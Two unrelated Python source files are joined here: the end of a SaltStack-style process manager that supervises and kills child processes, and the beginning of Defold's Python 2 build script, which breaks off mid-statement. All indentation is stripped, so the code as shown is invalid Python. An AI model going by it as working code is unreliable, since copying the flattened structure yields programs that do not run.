# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There is no SIGTERM handler installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There is no SIGINT handler installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.trace('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows() and not async:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
if self._restart_processes is True:
self.restart_process(pid)
elif async is True:
yield gen.sleep(10)
elif async is False:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
except IOError as exc:
# IOError with errno of EINTR (4) may be raised
# when using time.sleep() on Windows.
if exc.errno != errno.EINTR:
raise
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
# iterate over a copy since restart_process() mutates the process map
for pid, mapping in six.iteritems(self._process_map.copy()):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child let's just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
if multiprocessing.current_process().name != 'MainProcess':
# Since the main process will kill subprocesses by tree,
# no need to do anything in the subprocesses.
# Sometimes, when both a subprocess and the main process
# call 'taskkill', it will leave a 'taskkill' zombie process.
# We want to avoid this.
return
with salt.utils.fopen(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid {0}: {1}'.format(pid, p_map['Process']))
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno not in (errno.ESRCH, errno.EACCES):
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid {0}: {1}'.format(pid, p_map['Process']))
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid {0}: {1}'.format(pid, p_map['Process']))
try:
os.kill(pid, signal.SIGKILL)
except OSError:
# if the process has already exited, os.kill raises OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.warning(
'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
# with a function with a similar behavior would be ignored once this
# class's run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own attribute '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
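# Illustrative sketch (not from the original source): as the comment in
# __init__ notes, a subclass that takes parameters it does not pass down to
# MultiprocessingProcess must provide its own __getstate__/__setstate__ so the
# Windows spawn path can re-run __init__ in the child. A hypothetical example:
#
#   class OptsProcess(MultiprocessingProcess):
#       def __init__(self, opts, log_queue=None):
#           super(OptsProcess, self).__init__(log_queue=log_queue)
#           self.opts = opts
#       def __getstate__(self):
#           return {'opts': self.opts, 'log_queue': self.log_queue}
#       def __setstate__(self, state):
#           self._is_child = True
#           self.__init__(state['opts'], log_queue=state['log_queue'])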
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
sys.exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
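# Illustrative sketch (not from the original source): typical wiring of the
# classes above. A parent creates a ProcessManager, registers targets with
# add_process(), and blocks in run(); run() installs kill_children() as the
# SIGTERM/SIGINT handler when none is set, so children are cleaned up on exit.
# `worker_main`, `opts` and the process subclass are hypothetical.
#
#   manager = ProcessManager(name='ExampleManager')
#   manager.add_process(worker_main, args=[opts])
#   manager.add_process(SomeSignalHandlingProcessSubclass, kwargs={'opts': opts})
#   manager.run()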
|
build.py
|
#!/usr/bin/env python
# Copyright 2020 The Defold Foundation
# Licensed under the Defold License version 1.0 (the "License"); you may not use
# this file except in compliance with the License.
#
# You may obtain a copy of the License, together with FAQs at
# https://www.defold.com/license
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
# add build_tools folder to the import search path
import sys, os
from os.path import join, dirname, basename, relpath, expanduser, normpath, abspath
sys.path.append(os.path.join(normpath(join(dirname(abspath(__file__)), '..')), "build_tools"))
import shutil, zipfile, re, itertools, json, platform, math, mimetypes
import optparse, subprocess, urllib, urlparse, tempfile, time
import imp
import github
import run
import s3
import release_to_github
import BuildUtility
import http_cache
from tarfile import TarFile
from glob import glob
from threading import Thread, Event
from Queue import Queue
from ConfigParser import ConfigParser
BASE_PLATFORMS = [ 'x86_64-linux',
'x86_64-darwin',
'win32', 'x86_64-win32',
'x86_64-ios', 'armv7-darwin', 'arm64-darwin',
'armv7-android', 'arm64-android',
'js-web', 'wasm-web']
sys.dont_write_bytecode = True
try:
import build_nx64
sys.modules['build_private'] = build_nx64
except Exception, e:
pass
sys.dont_write_bytecode = False
try:
import build_private
except Exception, e:
pass
if 'build_private' not in sys.modules:
class build_private(object):
@classmethod
def get_target_platforms(cls):
return []
@classmethod
def get_install_host_packages(cls, platform): # Returns the packages that should be installed for the host
return []
@classmethod
def get_install_target_packages(cls, platform): # Returns the packages that should be installed for the target
return []
@classmethod
def install_sdk(cls, configuration, platform): # Installs the sdk for the private platform
pass
@classmethod
def is_library_supported(cls, platform, library):
return True
@classmethod
def is_repo_private(cls):
return False
@classmethod
def get_tag_suffix(cls):
return ''
def get_target_platforms():
return BASE_PLATFORMS + build_private.get_target_platforms()
PACKAGES_ALL="protobuf-2.3.0 waf-1.5.9 junit-4.6 protobuf-java-2.3.0 openal-1.1 maven-3.0.1 ant-1.9.3 vecmath vpx-1.7.0 luajit-2.1.0-beta3 tremolo-0.0.8 defold-robot-0.7.0 bullet-2.77 libunwind-395b27b68c5453222378bc5fe4dab4c6db89816a jctest-0.8 vulkan-1.1.108".split()
PACKAGES_HOST="protobuf-2.3.0 cg-3.1 vpx-1.7.0 luajit-2.1.0-beta3 tremolo-0.0.8".split()
PACKAGES_IOS_X86_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77".split()
PACKAGES_IOS="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77".split()
PACKAGES_IOS_64="protobuf-2.3.0 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 MoltenVK-1.0.41".split()
PACKAGES_DARWIN="protobuf-2.3.0 vpx-1.7.0".split()
PACKAGES_DARWIN_64="protobuf-2.3.0 luajit-2.1.0-beta3 vpx-1.7.0 tremolo-0.0.8 sassc-5472db213ec223a67482df2226622be372921847 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 MoltenVK-1.0.41".split()
PACKAGES_WIN32="luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 bullet-2.77 vulkan-1.1.108".split()
PACKAGES_WIN32_64="luajit-2.1.0-beta3 openal-1.1 glut-3.7.6 sassc-5472db213ec223a67482df2226622be372921847 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 vulkan-1.1.108".split()
PACKAGES_LINUX_64="luajit-2.1.0-beta3 sassc-5472db213ec223a67482df2226622be372921847 bullet-2.77 spirv-cross-2018-08-07 glslc-v2018.0 vulkan-1.1.108".split()
PACKAGES_ANDROID="protobuf-2.3.0 android-support-multidex androidx-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2".split()
PACKAGES_ANDROID_64="protobuf-2.3.0 android-support-multidex androidx-multidex android-28 luajit-2.1.0-beta3 tremolo-0.0.8 bullet-2.77 libunwind-8ba86320a71bcdc7b411070c0c0f101cf2131cf2".split()
PACKAGES_EMSCRIPTEN="protobuf-2.3.0 bullet-2.77".split()
PACKAGES_NODE_MODULES="xhr2-0.1.0".split()
DMSDK_PACKAGES_ALL="vectormathlibrary-r1649".split()
CDN_PACKAGES_URL=os.environ.get("DM_PACKAGES_URL", None)
DEFAULT_ARCHIVE_DOMAIN=os.environ.get("DM_ARCHIVE_DOMAIN", "d.defold.com")
DEFAULT_RELEASE_REPOSITORY=os.environ.get("DM_RELEASE_REPOSITORY") if os.environ.get("DM_RELEASE_REPOSITORY") else release_to_github.get_current_repo()
PACKAGES_IOS_SDK="iPhoneOS14.5.sdk"
PACKAGES_IOS_SIMULATOR_SDK="iPhoneSimulator14.5.sdk"
PACKAGES_MACOS_SDK="MacOSX11.3.sdk"
PACKAGES_XCODE_TOOLCHAIN="XcodeDefault12.5.xctoolchain"
PACKAGES_TAPI_VERSION="tapi1.6"
WINDOWS_SDK_10_VERSION="10.0.18362.0"
WINDOWS_MSVC_2019_VERSION="14.25.28610"
PACKAGES_WIN32_TOOLCHAIN="Microsoft-Visual-Studio-2019-{0}".format(WINDOWS_MSVC_2019_VERSION)
PACKAGES_WIN32_SDK_10="WindowsKits-{0}".format(WINDOWS_SDK_10_VERSION)
PACKAGES_NODE_MODULE_XHR2="xhr2-v0.1.0"
PACKAGES_ANDROID_NDK="android-ndk-r20"
PACKAGES_ANDROID_SDK="android-sdk"
PACKAGES_LINUX_CLANG="clang-9.0.0"
PACKAGES_LINUX_TOOLCHAIN="clang+llvm-9.0.0-x86_64-linux-gnu-ubuntu-16.04"
PACKAGES_CCTOOLS_PORT="cctools-port-darwin19-6c438753d2252274678d3e0839270045698c159b-linux"
NODE_MODULE_LIB_DIR = os.path.join("ext", "lib", "node_modules")
EMSCRIPTEN_VERSION_STR = "2.0.11"
EMSCRIPTEN_SDK = "sdk-{0}-64bit".format(EMSCRIPTEN_VERSION_STR)
PACKAGES_EMSCRIPTEN_SDK="emsdk-{0}".format(EMSCRIPTEN_VERSION_STR)
SHELL = os.environ.get('SHELL', 'bash')
# Don't use WSL from the msys/cygwin terminal
if os.environ.get('TERM','') in ('cygwin',):
if 'WD' in os.environ:
SHELL= '%s\\bash.exe' % os.environ['WD'] # the binary directory
ENGINE_LIBS = "testmain ddf particle glfw graphics lua hid input physics resource extension script render rig gameobject gui sound liveupdate crash gamesys tools record iap push iac webview profiler facebook engine sdk".split()
EXTERNAL_LIBS = "bullet3d".split()
def is_64bit_machine():
return platform.machine().endswith('64')
# Legacy format, should be removed eventually
# Returns: [linux|x86_64-linux|win32|x86_64-win32|darwin]
def get_host_platform():
if sys.platform == 'linux2':
arch = platform.architecture()[0]
if arch == '64bit':
return 'x86_64-linux'
else:
return 'linux'
elif sys.platform == 'win32' and is_64bit_machine():
return 'x86_64-win32'
else:
return sys.platform
# The difference from get_host_platform is that it always includes the architecture prefix
# Returns: [x86|x86_64]-[win32|linux|darwin]
def get_host_platform2():
if sys.platform == 'linux2':
arch = platform.architecture()[0]
if arch == '64bit':
return 'x86_64-linux'
else:
return 'x86-linux'
elif sys.platform == 'win32':
if is_64bit_machine():
return 'x86_64-win32'
else:
return 'x86-win32'
elif sys.platform == 'darwin':
if is_64bit_machine():
return 'x86_64-darwin'
else:
return 'x86-darwin'
else:
raise Exception("Unknown host platform: %s" % sys.platform)
def format_exes(name, platform):
prefix = ''
suffix = ['']
if 'win32' in platform:
suffix = ['.exe']
elif 'android' in platform:
prefix = 'lib'
suffix = ['.so']
elif 'js-web' in platform:
prefix = ''
suffix = ['.js']
elif 'wasm-web' in platform:
prefix = ''
suffix = ['.js', '.wasm']
elif platform in ['arm64-nx64']:
prefix = ''
suffix = ['.nss', '.nso']
else:
suffix = ['']
exes = []
for suff in suffix:
exes.append('%s%s%s' % (prefix, name, suff))
return exes
def format_lib(name, platform):
prefix = 'lib'
suffix = ''
if 'darwin' in platform or 'ios' in platform:
suffix = '.dylib'
elif 'win32' in platform:
prefix = ''
suffix = '.dll'
else:
suffix = '.so'
return '%s%s%s' % (prefix, name, suffix)
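# Illustrative examples (not from the original source), derived from the two
# helpers above:
#   format_exes('dmengine', 'x86_64-win32')    -> ['dmengine.exe']
#   format_exes('dmengine', 'wasm-web')        -> ['dmengine.js', 'dmengine.wasm']
#   format_exes('dmengine', 'armv7-android')   -> ['libdmengine.so']
#   format_lib('texc_shared', 'x86_64-darwin') -> 'libtexc_shared.dylib'
#   format_lib('texc_shared', 'x86_64-win32')  -> 'texc_shared.dll'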
class ThreadPool(object):
def __init__(self, worker_count):
self.workers = []
self.work_queue = Queue()
for i in range(worker_count):
w = Thread(target = self.worker)
w.setDaemon(True)
w.start()
self.workers.append(w)
def worker(self):
func, args, future = self.work_queue.get()
while func:
try:
result = func(*args)
future.result = result
except Exception,e:
future.result = e
future.event.set()
func, args, future = self.work_queue.get()
class Future(object):
def __init__(self, pool, f, *args):
self.result = None
self.event = Event()
pool.work_queue.put([f, args, self])
def __call__(self):
try:
# In order to respond to ctrl+c wait with timeout...
while not self.event.is_set():
self.event.wait(0.1)
except KeyboardInterrupt,e:
sys.exit(0)
if isinstance(self.result, Exception):
raise self.result
else:
return self.result
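# Illustrative sketch (not from the original source): ThreadPool and Future
# above form a minimal futures mechanism. Work is queued by constructing a
# Future, and calling the future blocks until the worker sets the result,
# re-raising any exception raised by the job. `download_fn` and `urls` are
# hypothetical.
#
#   pool = ThreadPool(4)
#   futures = [Future(pool, download_fn, url) for url in urls]
#   results = [f() for f in futures]   # blocks; re-raises worker exceptions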
def download_sdk(conf, url, targetfolder, strip_components=1, force_extract=False, format='z'):
if not os.path.exists(targetfolder) or force_extract:
if not os.path.exists(os.path.dirname(targetfolder)):
os.makedirs(os.path.dirname(targetfolder))
path = conf.get_local_or_remote_file(url)
conf._extract_tgz_rename_folder(path, targetfolder, strip_components, format=format)
else:
print "SDK already installed:", targetfolder
class Configuration(object):
def __init__(self, dynamo_home = None,
target_platform = None,
skip_tests = False,
skip_codesign = False,
skip_docs = False,
skip_builtins = False,
skip_bob_light = False,
disable_ccache = False,
no_colors = False,
archive_domain = None,
package_path = None,
set_version = None,
channel = None,
engine_artifacts = None,
waf_options = [],
save_env_path = None,
notarization_username = None,
notarization_password = None,
notarization_itc_provider = None,
github_token = None,
github_target_repo = None,
github_sha1 = None,
version = None,
codesigning_identity = None,
windows_cert = None,
windows_cert_pass = None,
verbose = False):
if sys.platform == 'win32':
home = os.environ['USERPROFILE']
else:
home = os.environ['HOME']
self.dynamo_home = dynamo_home if dynamo_home else join(os.getcwd(), 'tmp', 'dynamo_home')
self.ext = join(self.dynamo_home, 'ext')
self.dmsdk = join(self.dynamo_home, 'sdk')
self.defold = normpath(join(dirname(abspath(__file__)), '..'))
self.defold_root = os.getcwd()
self.host = get_host_platform()
self.host2 = get_host_platform2()
self.target_platform = target_platform
self.build_utility = BuildUtility.BuildUtility(self.target_platform, self.host, self.dynamo_home)
self.skip_tests = skip_tests
self.skip_codesign = skip_codesign
self.skip_docs = skip_docs
self.skip_builtins = skip_builtins
self.skip_bob_light = skip_bob_light
self.disable_ccache = disable_ccache
self.no_colors = no_colors
self.archive_path = "s3://%s/archive" % (archive_domain)
self.archive_domain = archive_domain
self.package_path = package_path
self.set_version = set_version
self.channel = channel
self.engine_artifacts = engine_artifacts
self.waf_options = waf_options
self.save_env_path = save_env_path
self.notarization_username = notarization_username
self.notarization_password = notarization_password
self.notarization_itc_provider = notarization_itc_provider
self.github_token = github_token
self.github_target_repo = github_target_repo
self.github_sha1 = github_sha1
self.version = version
self.codesigning_identity = codesigning_identity
self.windows_cert = windows_cert
self.windows_cert_pass = windows_cert_pass
self.verbose = verbose
if self.github_token is None:
self.github_token = os.environ.get("GITHUB_TOKEN")
self.thread_pool = None
self.futures = []
if version is None:
with open('VERSION', 'r') as f:
self.version = f.readlines()[0].strip()
self._create_common_dirs()
def __del__(self):
if len(self.futures) > 0:
print('ERROR: Pending futures (%d)' % len(self.futures))
os._exit(5)
def _create_common_dirs(self):
for p in ['ext/lib/python', 'share', 'lib/js-web/js', 'lib/wasm-web/js']:
self._mkdirs(join(self.dynamo_home, p))
def _mkdirs(self, path):
if not os.path.exists(path):
os.makedirs(path)
def _log(self, msg):
print msg
sys.stdout.flush()
sys.stderr.flush()
def distclean(self):
if os.path.exists(self.dynamo_home):
self._log('Removing %s' % self.dynamo_home)
shutil.rmtree(self.dynamo_home)
for lib in ['dlib','texc']+ENGINE_LIBS:
builddir = join(self.defold_root, 'engine/%s/build' % lib)
if os.path.exists(builddir):
self._log('Removing %s' % builddir)
shutil.rmtree(builddir)
# Recreate dirs
self._create_common_dirs()
self._log('distclean done.')
def _extract_tgz(self, file, path):
self._log('Extracting %s to %s' % (file, path))
version = sys.version_info
suffix = os.path.splitext(file)[1]
# Avoid a bug in python 2.7 (fixed in 2.7.2) related to not being able to remove symlinks: http://bugs.python.org/issue10761
if self.host == 'x86_64-linux' and version[0] == 2 and version[1] == 7 and version[2] < 2:
fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'}
run.env_command(self._form_env(), ['tar', 'xf%s' % fmts.get(suffix, 'z'), file], cwd = path)
else:
fmts = {'.gz': 'gz', '.xz': 'xz', '.bzip2': 'bz2'}
tf = TarFile.open(file, 'r:%s' % fmts.get(suffix, 'gz'))
tf.extractall(path)
tf.close()
def _extract_tgz_rename_folder(self, src, target_folder, strip_components=1, format=None):
src = src.replace('\\', '/')
force_local = ''
if os.environ.get('GITHUB_SHA', None) is not None and os.environ.get('TERM', '') == 'cygwin':
force_local = '--force-local' # to make tar not try to "connect" because it found a colon in the source file
self._log('Extracting %s to %s/' % (src, target_folder))
parentdir, dirname = os.path.split(target_folder)
old_dir = os.getcwd()
os.chdir(parentdir)
if not os.path.exists(dirname):
os.makedirs(dirname)
if format is None:
suffix = os.path.splitext(src)[1]
fmts = {'.gz': 'z', '.xz': 'J', '.bzip2': 'j'}
format = fmts.get(suffix, 'z')
cmd = ['tar', 'xf%s' % format, src, '-C', dirname]
if strip_components:
cmd.extend(['--strip-components', '%d' % strip_components])
if force_local:
cmd.append(force_local)
run.env_command(self._form_env(), cmd)
os.chdir(old_dir)
def _extract_zip(self, file, path):
self._log('Extracting %s to %s' % (file, path))
def _extract_zip_entry( zf, info, extract_dir ):
zf.extract( info.filename, path=extract_dir )
out_path = os.path.join( extract_dir, info.filename )
perm = info.external_attr >> 16L
os.chmod( out_path, perm )
with zipfile.ZipFile(file, 'r') as zf:
for info in zf.infolist():
_extract_zip_entry( zf, info, path )
def _extract(self, file, path):
if os.path.splitext(file)[1] == '.zip':
self._extract_zip(file, path)
else:
self._extract_tgz(file, path)
def _copy(self, src, dst):
self._log('Copying %s -> %s' % (src, dst))
shutil.copy(src, dst)
def _copy_tree(self, src, dst):
self._log('Copying %s -> %s' % (src, dst))
shutil.copytree(src, dst)
def _download(self, url):
self._log('Downloading %s' % (url))
path = http_cache.download(url, lambda count, total: self._log('Downloading %s %.2f%%' % (url, 100 * count / float(total))))
if not path:
self._log('Downloading %s failed' % (url))
return path
def _check_package_path(self):
if self.package_path is None:
print("No package path provided. Use either --package-path option or DM_PACKAGES_URL environment variable")
sys.exit(1)
def install_ext(self):
def make_package_path(root, platform, package):
return join(root, 'packages', package) + '-%s.tar.gz' % platform
def make_package_paths(root, platform, packages):
return [make_package_path(root, platform, package) for package in packages]
self._check_package_path()
print("Installing common packages")
for p in PACKAGES_ALL:
self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.ext)
for p in DMSDK_PACKAGES_ALL:
self._extract_tgz(make_package_path(self.defold_root, 'common', p), self.dmsdk)
# TODO: Make sure the order of install does not affect the outcome!
platform_packages = {
'win32': PACKAGES_WIN32,
'x86_64-win32': PACKAGES_WIN32_64,
'x86_64-linux': PACKAGES_LINUX_64,
'darwin': PACKAGES_DARWIN, # ?? Still used by bob-light?
'x86_64-darwin': PACKAGES_DARWIN_64,
'armv7-darwin': PACKAGES_IOS,
'arm64-darwin': PACKAGES_IOS_64,
'x86_64-ios': PACKAGES_IOS_X86_64,
'armv7-android': PACKAGES_ANDROID,
'arm64-android': PACKAGES_ANDROID_64,
'js-web': PACKAGES_EMSCRIPTEN,
'wasm-web': PACKAGES_EMSCRIPTEN
}
base_platforms = self.get_base_platforms()
target_platform = self.target_platform
other_platforms = set(platform_packages.keys()).difference(set(base_platforms), set([target_platform, self.host]))
if target_platform in ['js-web', 'wasm-web']:
node_modules_dir = os.path.join(self.dynamo_home, NODE_MODULE_LIB_DIR)
for package in PACKAGES_NODE_MODULES:
path = join(self.defold_root, 'packages', package + '.tar.gz')
name = package.split('-')[0]
self._extract_tgz(path, join(node_modules_dir, name))
installed_packages = set()
for platform in other_platforms:
packages = platform_packages.get(platform, [])
package_paths = make_package_paths(self.defold_root, platform, packages)
print("Installing %s packages " % platform)
for path in package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(package_paths)
for base_platform in self.get_base_platforms():
packages = list(PACKAGES_HOST) + build_private.get_install_host_packages(base_platform)
packages.extend(platform_packages.get(base_platform, []))
package_paths = make_package_paths(self.defold_root, base_platform, packages)
package_paths = [path for path in package_paths if path not in installed_packages]
if len(package_paths) != 0:
print("Installing %s packages" % base_platform)
for path in package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(package_paths)
# For easier usage with the extender server, we want the linux protoc tool available
if target_platform in ('x86_64-darwin', 'x86_64-win32', 'x86_64-linux'):
protobuf_packages = filter(lambda x: "protobuf" in x, PACKAGES_HOST)
package_paths = make_package_paths(self.defold_root, 'x86_64-linux', protobuf_packages)
print("Installing %s packages " % 'x86_64-linux')
for path in package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(package_paths)
target_packages = platform_packages.get(self.target_platform, []) + build_private.get_install_target_packages(self.target_platform)
target_package_paths = make_package_paths(self.defold_root, self.target_platform, target_packages)
target_package_paths = [path for path in target_package_paths if path not in installed_packages]
if len(target_package_paths) != 0:
print("Installing %s packages" % self.target_platform)
for path in target_package_paths:
self._extract_tgz(path, self.ext)
installed_packages.update(target_package_paths)
print("Installing python wheels")
run.env_command(self._form_env(), ['python', './packages/get-pip.py', 'pip==19.3.1'])
run.env_command(self._form_env(), ['python', '-m', 'pip', '-q', '-q', 'install', '-t', join(self.ext, 'lib', 'python'), 'requests', 'pyaml'])
for whl in glob(join(self.defold_root, 'packages', '*.whl')):
self._log('Installing %s' % basename(whl))
run.env_command(self._form_env(), ['python', '-m', 'pip', '-q', '-q', 'install', '-t', join(self.ext, 'lib', 'python'), whl])
print("Installing javascripts")
for n in 'js-web-pre.js'.split():
self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share'))
for n in 'js-web-pre-engine.js'.split():
self._copy(join(self.defold_root, 'share', n), join(self.dynamo_home, 'share'))
print("Installing profiles etc")
for n in itertools.chain(*[ glob('share/*%s' % ext) for ext in ['.mobileprovision', '.xcent', '.supp']]):
self._copy(join(self.defold_root, n), join(self.dynamo_home, 'share'))
# Simple way to reduce number of warnings in the build
proto_path = os.path.join(self.dynamo_home, 'share', 'proto')
if not os.path.exists(proto_path):
os.makedirs(proto_path)
# Note: This is a step we want to separate from install_ext
# since it should actually be before install_ext (e.g. to build the extensions)
self.install_sdk()
def get_local_or_remote_file(self, path):
if os.path.isdir(self.package_path): # is it a local path?
if os.path.exists(path):
return os.path.normpath(os.path.abspath(path))
print "Could not find local file:", path
sys.exit(1)
dirname, basename = os.path.split(path)
path = dirname + "/" + urllib.quote(basename)
path = self._download(path) # it should be an url
if path is None:
print("Error. Could not download %s" % path)
sys.exit(1)
return path
def check_sdk(self):
sdkfolder = join(self.ext, 'SDKs')
folders = []
if self.target_platform in ('x86_64-darwin', 'armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
folders.append(join(sdkfolder, PACKAGES_MACOS_SDK))
folders.append(join(sdkfolder, PACKAGES_XCODE_TOOLCHAIN))
if self.target_platform in ('armv7-darwin', 'arm64-darwin', 'x86_64-ios'):
folders.append(join(sdkfolder, PACKAGES_IOS_SDK))
folders.append(join(sdkfolder, PACKAGES_IOS_SIMULATOR_SDK))
if self.target_platform in ('x86_64-win32', 'win32'):
